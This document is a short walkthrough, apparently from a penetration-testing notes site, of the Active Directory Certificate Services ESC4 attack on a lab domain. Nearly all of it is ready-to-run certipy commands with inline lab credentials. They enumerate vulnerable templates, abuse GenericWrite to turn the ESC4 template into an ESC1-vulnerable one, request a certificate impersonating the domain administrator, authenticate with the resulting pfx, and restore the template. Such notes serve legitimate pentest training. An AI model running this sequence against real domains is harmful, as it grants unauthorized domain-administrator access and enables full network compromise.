ADCS - ESC4

Vulnerable Certificate Template Access Control — ESC4

Certificate templates are securable objects in Active Directory, meaning they have a security descriptor that specifies which Active Directory principals have specific permissions over the template.

Find the Vulnerabilities:

sudo certipy find -u joaquin.Pereida@maryland.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout

  • Take the ESC4 template and change it to be vulnerable to ESC1 technique by using the genericWrite privilege we got. (we didn’t set the target here as we target the ldap)

sudo certipy template -u joaquin.Pereida@maryland.local -p 'horse' -template ESC4 -save-old -debug

  • Exploit ESC1 on the modified ESC4 template

sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target salisbury.maryland.local -template ESC4 -ca MARYLAND-CA -upn administrator@maryland.local

  • authentication with the pfx

sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

  • Rollback the template configuration

certipy template -u joaquin.Pereida@maryland.local -p 'horse' -template ESC4 -configuration ESC4.json
PreviousADCS - ESC2 & ESC3NextADCS - ESC6

Last updated